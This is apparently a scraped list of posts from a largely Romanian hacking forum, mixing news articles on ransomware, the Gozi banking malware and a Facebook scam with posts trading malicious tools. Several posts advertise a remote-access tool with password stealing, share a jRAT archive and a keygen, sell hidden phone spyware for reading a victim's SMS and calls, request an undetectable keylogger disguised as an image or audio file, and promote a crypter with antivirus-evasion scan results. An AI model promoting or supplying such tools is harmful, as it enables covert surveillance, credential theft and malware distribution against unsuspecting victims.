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  1. This is tool that allow you to control your computer form anywhere in world with full support to unicode language. Latest Features: 1. The re-application from scratch programming 2. a simple amendment to the Alsuchit to make it lighter than the previous 3. correct some of the mistakes and correct When you copy the value in the Registry 4. Amendment in the filming of the screen faster than the previous version 5. pull password stronger than the previous addition is brought any update when you save your password 6. feature [Transfer] in, file manager to see transport and lifting full control case 7. new additions in Builder 8. became less the size of the server [83 KB] 9. many changes in this version rghost.net/7QQZs742M Have fun.
  2. https://www.sapien.com/software/sapien_software_suite Virus scan: https://www.virustotal.com/en/file/c11c02398198be84ef65b5a8c7e8916a569061f683ea368ff87454a42c3f1066/analysis/ DL link: Zippyshare.com - keygen.rar Activare offline
  3. The virus on VT: https://www.virustotal.com/en/file/8f35f6f780acccfb406b918db6ef01111dd2c5200a16e97f25d35f76e2532e6d/analysis/1432362743/ The virus inject many process like it: but I cann't found how it autostart. When OS restarted, it start itself via explorer.exe, but I do not know how it auto started. log: 2015/05/23 15:54:55 c:\windows\explorer.exe Create new process c:\users\test\appdata\roaming\mozilla\firefox\profiles\4ude5xz7.default\storage\permanent\xulstore.exe?Cmd line: "C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\4ude5xz7.default\storage\permanent\xulstore.exe" Download Pass: infected Source
  4. Dev-Host - jrat-v5.rar - The Ultimate Free File Hosting / File Sharing Service passwoed:1 https://www.virustotal.com/en/file/b3c3790e8e8225609bb4090c02c8efbad780010d6e4cb5370a3153e9c432c6ef/analysis/
  5. A south suburban police department paid a $500 ransom to an unidentified hacker to regain access to data from a police computer the hacker managed to disable, records show. Midlothian in January was hit with a form of computer virus called Cryptoware, said Calvin Harden Jr., an IT vendor who works with the village. The hacker demanded payment through bitcoin, a digital currency often used by individuals engaging in sophisticated or sometimes illegal activities on the Internet. "It didn't encrypt everything in the police department. It was just that computer and specific files," not the entire system, Harden said. The hacker didn't access the information on the computer but merely shut it down and made it inaccessible, Harden said. The Federal Trade Commission and the FBI issued a public warning last year to consumers and businesses about the virus, saying it's "essentially extortion." Midlothian's police force isn't the first government agency to fall victim to the cybercrime. The city of Detroit and a Tennessee sheriff's office both encountered Cryptoware hackers who sought ransoms in the past year, according to published reports. Fred Hayes, Elwood's top cop and president of the Illinois Association of Chiefs of Police, said this type of virus is becoming more common and that federal officials have been in touch about it. His advice to departments is to back up their data. "This is something that quite a few people recently, and when I say recently (I mean) over the last year or two, have been experiencing," Hayes said. At the Midlothian Police Department, someone opened an email that contained the virus, allowing the virus to lock down the computer, Harden said. A message popped up on the machine demanding money in exchange for a virtual code that would return access, Harden said. Midlothian Police Chief Harold Kaufman confirmed that the department had been hacked but otherwise declined to comment. Neither Kaufman, Midlothian's mayor, nor the village clerk returned further messages asking whether the village would pursue the hacker, but Harden said he believed officials would do so. An FBI spokeswoman wouldn't confirm whether the village made the FBI aware of the incident. Village officials released a copy of the town's invoice in response to an open records request by the Tribune. The invoice, "for MPD virus," shows the village sent a $606 money order to a bitcoin cafe in New York to transmit the money to the hacker. The payment included bank fees and surcharges. Officials tried to wire the money through Bank of America, Harden said, but couldn't. The village had to make a difficult decision whether to comply with the demand, Harden said, and chose to because a pursuit of the hacker might have been more trouble than it's worth. "Because the backups were also infected, the option was to pay the hacker and get the files unencrypted," Harden said, "which is what we decided to do." Harden said he believes the hacker's actions are criminal, which is why the hacker requested "pretty much untraceable" bitcoin as payment. The sheriff's office in Tennessee paid $572 to a hacker known as Nimrod Gruber to regain access to its files, according to reports. Detroit's mayor said in November that the database that was frozen there wasn't essential to government operations, and the city refused to pay a ransom of several hundred thousand dollars a hacker sought. Mike Alsup, co-chair of the Communications and Technology Committee for the Illinois Association of Chiefs of Police, said the issue of cyber security "weighs heavily" on police chiefs. "Chiefs across the entire nation are concerned with the growing trend of computer crime," Alsup said. "Hardly a day goes by that we don't see in both the print and audio media, we hear of instances of computer crime, computer hacking, large organized criminal groups internationally that are stealing through the use of computers." Harden, Midlothian's IT vendor, said he does work for a law firm that experienced a similar virus last year, and added that it's "happening to people every day." "When you tell someone this, it's sort of they're like, 'What?' It's sort of a crazy scenario," Harden said. "But it's happening." Midlothian cops pay bitcoin ransom to retrieve data from hacker - Chicago Tribune
  6. Am nevoie de cineva care imi poate face un virus FUD. Platesc pp. Pm/Reply cu preturile
  7. POZ?: VIRUS TOTAL: DOWNLOAD: http://www.sendspace.com/file/66icla http://www.fileswap.com/dl/4Yi1hQehbt/
  8. Vand soft care permite LOCALIZARE/INTERCEPTARE/ACCES IN TELEFON/ACCES JURNAL APELURI/ACCES SMS-URI...chiar mai mult poti suna, trimite sms de pe telefonul victima. Softul este f.simplu de instalat, trebuie doar sa aveti acces 5min la telefonul victimei, nu se depisteaza cu nici un antivirus de telefoane, odata instalat virusul este ascuns si nu apare in aplicatii deci practic este invvisibil. Pret 500eur
  9. Am decis sa postez aici o lista cu mai multe siteuri de analizat malware , url si antivirusi online. Sper sa va fie de folos:) Malware Scan http://www.virustotal.com/ [File and Website] Jotti's malware scan Anubis: Analyzing Unknown Binaries VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 37 AntiVirus Engines! ThreatExpert - Online File Scanner Public Sandbox - Submit a Sample for Malware Analysis Eureka Malware Analysis Page Wepawet - Home [File and Website] https://www.metascan-online.com/ Xandora - Your Online Binary Analyser Free Online Multi Engine Antivirus File and URL Scanner - Powered by NoVirusThanks.org [File and Website] Irish Cream Service - Free Antivirus Scan Service [File and Website] ScanThis! Free online virus scanner [File and Website] Zscaler Zulu URL Risk Analyzer - Zulu Website Scan Automated Exploit Analysis Online Virus Scanner - Scan Links for Malware, Trojans and Viruses Sucuri SiteCheck - Free Website Malware Scanner Online Webpage Scanning for Malware Attacks | Web Inspector Online Scan urlquery.net - Free URL scanner Servicio de seguridad web, desenmascarame Scan websites for exploits, malware and other malicious threats using multiple web reputation engines and domain blacklists jsunpack - a generic JavaScript unpacker [Website, Javascript, PDF, HTML and pcap] Website/URL/Link Scanner Safety Check for Phishing, Malware, Viruses - ScanURL.net AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone FREE Online Website Malware Scanner | Website Security Monitoring & Malware Removal | Quttera Dr.Web online scanners https://www.trustedsource.org/?p=mcafee UrlScan 3.1 : The Official Microsoft IIS Site UnThreat Online Scanner Antivirus Online http://quickscan.bitdefender.com/ro/ Free Online Virus Scan - Bitdefender Online Virus Scanner ESET Free Online Scanner :: Complete Malware Detection :: ESET Emsisoft Web Malware Scan | Dual-Engine Browser Scanner - Free removal of Viruses, Bots, Spyware, Keyloggers, Trojans and Rootkits Free Online Virus Scan - Antivirus Software - Trend Micro USA Panda Activescan | Free Online Antivirus | Free Virus Disinfection - Panda Security https://www.grc.com/x/ne.dll?bh0bkyd2 :: WindowSecurity.com How To - Remove threats - Removal Tools | F-Secure Rising Online Virus Scanner FREE ANTIVIRUS online: ActiveScan 2.0 - PANDA SECURITY https://security.symantec.com/sscv6/GetBrowser.asp?pkj=QTHYGXMQPHPUCCBMMHL&langid=ie&venid=sym&plfid=00&from=/sscv6/home.asp PC Flank: Make sure you're protected on all sides. Sursa: cleanbytes.net/malware-online-scanners
  10. salut! platesc daca ma poti ajuta sa fac un keylogger sub forma pdf jpg mp3 eu am facut una jpg dar este detectabila!! platesc pe cineva sa mil faca cap coada sau pe cineva sa imi cripteze doar acea poza ce o am eu sau mp3`ul! ma intereseaza un keylogger 100% nedetectabil sa imi vina in mail sau intr-un ftp doar text-ul! din 1-2-3-4 ore nu conteaza!
  11. Un nou virus de Facebook ia amploare in Romania. Iti promite ca iti arata cine ti-a vazut profilul Multi utilizatori din Romania s-au plans de acest scam in weekend. Un nou scam aparut pe Facebook ii indeamna pe romani sa dea click pe un link ca sa vada cine le-a vizualizat profilul. Din pacate, toti curiosii care au facut asta, s-au trezit cu contul infectat. Aceasta amenintare s-a extins puternic in weekend in Romania. Specialistii in securitate informatica sustin ca astfel de scamuri sunt vechi, insa cu toate acestea numarul celor care pica in plasa ramane ridicat. Ei mai spun ca nicio aplicatie de la Facebook nu iti permite sa vezi persoanele care iti vizualizeaza informatiile trecute in profil. Prin urmare, toate postarile care iti promit asa ceva sunt false. “Nicio aplicatie legitima de Facebook nu le permite utilizatorilor sa vada cine le vizualizeaza profilul. Acest scam duce la o frauda care, dupa nenumarate sondaje, ii redirectioneaza pe utilizatori catre premii false cu telefoane de ultima generatie. Escrocherii de acest gen circula de ani de zile in retelele sociale, dar continua sa faca victime printre utilizatori, indiferent de experienta sau varsta. Ele se bazeaza pe mecanisme de inginerie sociala si pe stimuli psihologici care ii provoaca pe oameni sa dea repede click, fara sa se gandeasca la consecinte. Cine nu isi doreste un premiu in schimbul unui singur like pe Facebook? Scamul fura Token-urile de acces (access tokens) ale unei aplicatii legitime de fotografii, apoi posteaza in numele utilizatorilor, accesandu-le datele personale. Aplicatia periculoasa se raspandeste usor printre prietenii victimei, care sunt etichetati automat la postarea mesajului. Bitdefender blocheaza linkul periculos, pe care l-a marcat ca frauda”, spune Catalin Cosoi, Chief Security Strategist la Bitdefender Romania. Surs?: Un nou virus de Facebook ia amploare in Romania. Iti promite ca iti arata cine ti-a vazut profilul - www.yoda.ro
  12. Being an online criminal isn't always easy. For one thing, there's all that tedious administrative overhead of deploying command and control servers, finding proxies to mask them, and shifting IP addresses to stay off of private security blacklists. Today's savvy cyber criminal, therefore, often outsources the work to so-called "bulletproof" hosting operations, which rent servers to criminals and take care of all the dirty details needed to keep them online. That was the approach taken by the Russian creator of malware known as Gozi—malicious password-stealing software which the US government today called "one of the most financially destructive computer viruses in history"—to store his stolen data. But as the malware man found out, bulletproof hosts can be taken down with enough effort. Even when they're based in Romania. Gozi was coded back in 2005 and deployed in 2007. Back then, it largely targeted Europeans. When installed on a computer, the virus waited until the user visited an online banking site and then grabbed account names and passwords—anything that might be needed for a criminal to transfer money out of the user's account. This information was then sent silently to the Gozi command and control servers, from which it was harvested on a regular basis. By 2010, the malware innovated in two important ways. First, it had gained the capability to do sophisticated Web injection. When an infected computer was pointed at a banking website, the virus wouldn't simply steal account login information; it could be configured to inject additional data requests right into the bank's webpage. This made it almost impossible to tell the requests were not being made by the bank itself. In this way, the malware could be tweaked to ask for Social Security numbers, driver's license information, a mother's maiden name, PIN codes—anything a client wanted. The second innovation? Gozi expanded to the US and started targeting specific US banks. The collected information was then sold to other criminals, who quickly transferred money out of the targeted bank accounts. On August 13, 2010, for instance, $8,710 went missing from a Bronx resident's account. The amounts could go much higher; in February 2012, another New York resident lost $200,000. And it got even worse. An FBI investigation, revealed today, found two Gozi-infected computers had led to combined losses of $6 million for their two owners. Total losses appear to have reached "tens of millions" of dollars. So, starting in 2010, the FBI launched an investigation. It didn't take long to find Gozi's creator, a 25-year-old Moscow resident named Nikita Kuzmin. By November 2010, Kuzmin had been arrested during a trip to the US; by May 2011 he pleaded guilty and agreed to forfeit his Gozi earnings, which might reach up to $50 million. Deniss ?alovskis, the 27-year-old Latvian man who allegedly coded the Web injects and customized them for various banks was picked up by Latvian police in November 2012. But it was the bulletproof host behind Gozi who turned out to be the most interesting catch—and who took longest to reel in. Injection in action: the original banking website. The altered site, now demanding much more information. “Answer me, damn it, I'm Virus” FBI agents collected an incredible trove of data on the Gozi conspirators. According to court documents, this data cache included wiretaps, seized servers, an interview with a Gozi distributor, and even a host of chat logs lifted from a server used by the criminals behind Gozi. Despite all that, in the end what brought down the bulletproof host was as simple as a cell phone number. With the number in hand, the FBI worked with the Romanian Police Directorate for Combating Organized Crime (DCCO), since the number was based in Bucharest. The DCCO obtained court permission to tap the phone, then agents listened to calls, watched text messages, and intercepted Web addresses and passwords entered on the handset for three months in the spring of 2012. On April 1, 2012, the phone's user sent a text message saying (according to an FBI translation), "Answer me, damn it, I'm Virus." The next day, a male voice called the phone and addressed its users as "Virus." But who was Virus? Someone who wasn't too careful with his cell phone, for one thing. The phone was registered to a company called "KLM Internet & Gaming SRL," which was itself registered to a Bucharest man named Mihai Ionut Paunescu. The corporate registration was later changed, and investigators weren't positive who was actually using the phone until they listened in on a call in which the phone's user identified himself to the Romanian Commercial Bank as "Mihai Ionut Paunescu" and provided the correct national ID number corresponding to Paunescu. (The caller was seeking information on the proper procedure to withdraw US$20,000.) Watching the smartphone's Web browsing history confirmed this phone belonged to the bulletproof host authorities sought. Paunescu regularly visited a site called adminpanel.ro. Romanian police watched as Paunescu entered the username and password to the site. Next they obtained court permission to search it. They did the search—and provided the information to the FBI. The site was essentially a set of status tables covering 130 physical computer servers which Paunescu apparently leased from legitimate hosting operations before reselling to less legitimate cyber criminals of all stripes. Subtlety was not the order of the day here. Adminpanel.ro's data tables contained notes on what each virtual machine on each server was being used for, and these included things (in English) like "spy/malware," "semi-legal non sbl," "facebook spam 0%sbl," "illegal," and "100%SBLmalware." ("SBL" is an apparent reference to the well-known Spamhaus Block List targeting spammers.) Keeping these 130 servers up and running for his clients apparently netted Paunescu a good deal of money. He kept meticulous records of how much he paid to lease every server and how much he received for leasing it back out. A typical entry shows that he spent "114EU" (euros) on a server that he resold for "330EU"—not a bad markup. As for "Virus," it turned out that Paunescu used this as his online nickname. Last month, Romanian police arrested him, bringing the Gozi story to a close. Wayward youth The US government revealed the three arrests today. It unsealed indictments against Kuzim, ?alovskis, and Paunescu which make clear just how young all three men were when the alleged criminal behavior began. Kuzmin got started with Gozi back in 2005, when he was just 18. ?alovskis was allegedly involved since he was 20. Paunescu is only 28 now and has allegedly been in the bulletproof hosting business for years. Kuzmin pleaded guilty and will be sentenced in the US, where he faces a maximum 95 years in prison. Extradition proceedings are underway for the other two, who could each face a max of 60 years in a US cell. Sursa: How the feds put a bullet in a “bulletproof” Web host | Ars Technica
  13. Dupa cum am mai spus: Scot versiunea "BrickCrypter". Cu noi imbunatatiri. L-am testat destul de bine cu AVG si nu a scos niciun sunet. Cum am mai spus. Versiunea ramane destul de privata. ( verificare hash Processor ID) Tigo >> megan >> AER(criptat) >> base Broken Pentru "Codul" din program trimiteti un PM cu ProcessorID si va raspund cu hashul corespunzator. Sper sa va fie de ajutor. Voi posta si viitoarele versiuni (sa speram mai putin detectate). Scan: File Info Report Date: 17.10.2012 04:10:59 Link To Scan: Scan Result | Element Scanner File Name:crypted.exe File Size: 930891 bytes MD5 Hash: e153927e7d58b838b17a008ed65a446d SHA1 Hash: bce0bc0890cdbac218c557418bef73c9ad128557 Status: INFECTED Total Results: 7/35 AVG Free-Clean. ArcaVir-Clean. Avast 5-Clean. AntiVir (Avira)- TR/Dropper.Gen. BitDefender- Gen:Variant.MSILKrypt.2. VirusBuster Internet Security-Clean. Clam Antivirus-Clean. COMODO Internet Security-Clean. Dr.Web-Clean. eTrust-Vet-Clean. F-PROT Antivirus-Clean. F-Secure Internet Security- Gen:Variant.MSILKrypt.2. G Data- Gen:Variant.MSILKrypt.2. IKARUS Security- VirTool.MSIL. Kaspersky Antivirus-Clean. McAfee-Clean. MS Security Essentials-Clean. ESET NOD32- Trojan.MSIL/Injector.VF. Norman-Clean. Norton Antivirus-Clean. Panda Security-Clean. A-Squared-Clean. Quick Heal Antivirus-Clean. Rising Antivirus-Clean. Solo Antivirus-Clean. Sophos-Clean. Trend Micro Internet Security-Clean. VBA32 Antivirus-Clean. Vexira Antivirus-Clean. Zoner AntiVirus-Clean. Ad-Aware-Clean. BullGuard- Gen:Variant.MSILKrypt.2. Immunet Antivirus-Clean. K7 Ultimate-Clean. VIPRE-Clean. Scan Result | Element Scanner Mi-e prea lene sa tot explic de ID processorului : https://rstcenter.com/forum/50985-c-login-cu-processor-id.rst Aveti acolo un Chall facut de mine. In exe este un buton care iti zice care e "PID".
  14. Amenintarea *********, luata in serios. Hackerii pot "DECAPITA" internetul peste cateva zile O amenintare recenta, venita din partea grupului de hackeri *********, anunta nici mai mult nici mai putin decat oprirea internetului pe data de 31 martie. Evident, subiectul a fost aprins discutat pe forumuri.Mai ales ca ********* a anuntat si modul in care va pune in practica totul: prin dezactivarea Domain Name Service, adica DNS, pentru cunoscatori. Acesta are rolul de a transforma adresa de web pe care o introducem in browser (de exemplu Google) in ceea ce internetul foloseste de fapt: adresa IP (ceva de genul Este practic cartea de telefon pentru internet. Daca poti stopa accesul la cartea de telefon, atunci internetul este inutilizabil. Teoria care sta la baza atacului anuntat se bazeaza pe faptul ca DS-ul este o structura de tip arbore: incepe cu 13 servere la nivelul cel mai ridicat, iar fiecare dintre acestea comunica la un nivel inferior si tot asa. Cand o schimbare este facuta la cel mai ridicat nivel, este copiata pe tot netul, astfel ca atunci cand cauti ceea este efectiv copia ta locala a cartii de telefon, te duce in locul corect.Daca cineva ar putea opri cateva sau toate cele 13 servere de la cel mai inalt nivel al DNS-ului sa functioneze corect, in special in ceea ce priveste comunicarea cu alte servere, acest lucru ar afecta si restul arborelui de servere si foarte rapid, nimeni nu ar mai putea folosi adresele cunoscute.Atunci cand amenintarea a fost facuta publica, a generat o oarecare ingrijorare, pentru ca respectivii hackeri au identificat corect locururile unde se afla sistemele de top. Insa aceasta informatie era relativ usor de obtinut.S-a sugerat chiar ca atacul pe care ar urma sa-l puna in practica ar fi unul de tip DDOS (distributed denial of service) asupra nivelului de top al DNS. Un atac DDOS presupune "bombardarea" unui server de web cu atat de multe solicitari in cat nu mai poate raspunde solicitarilor legitime. Graham Cluley, expert in securitate IT, exemplifica: "E ca si cum 15 oameni grrasi ar incerca sa intre printr-o usa rotativa in acelasi timp - nimic nu se misca".Una din metodele prin care hackerii ar putea genera suficient trafic este prin utilizarea neautorizata a computerelor unor oameni normali, pentru a trimite solicitiarile. Asa ca pot folosi un virus care sa transforme respectivele calculatoare in "roboti" pentru a-si indeplini scopul. Drept urmare, utilizatorii trebuie sa fie in garda, mai ales ca tehnica a fost folosita pentru a provoca accesul la site-ul Interpol, pe 28 februarie 2012. A fost un raspuns al celor de la ********* ca raspuns la arestarile recente. Sursa: http://ro.stiri.yahoo.com/amenintarea-*********-luata-serios-hackerii-pot-decapita-internetul-062100133.html
  15. O mare problema, cred ca am luat un virus . Am 2 partiti C ,resp D. Problema care este intru in D: si nu imi arata nimic, dar la properies imi spune ca totul este in regula, partitia este ocupata la fel ca naintea necazului. Deci cum pot recupera tot ce este acolo?? Ma poate ajuta cineva?
  16. Foarte frumos tutorialul. Bravo B7ackAnge7z! Mersi pentru informatii.
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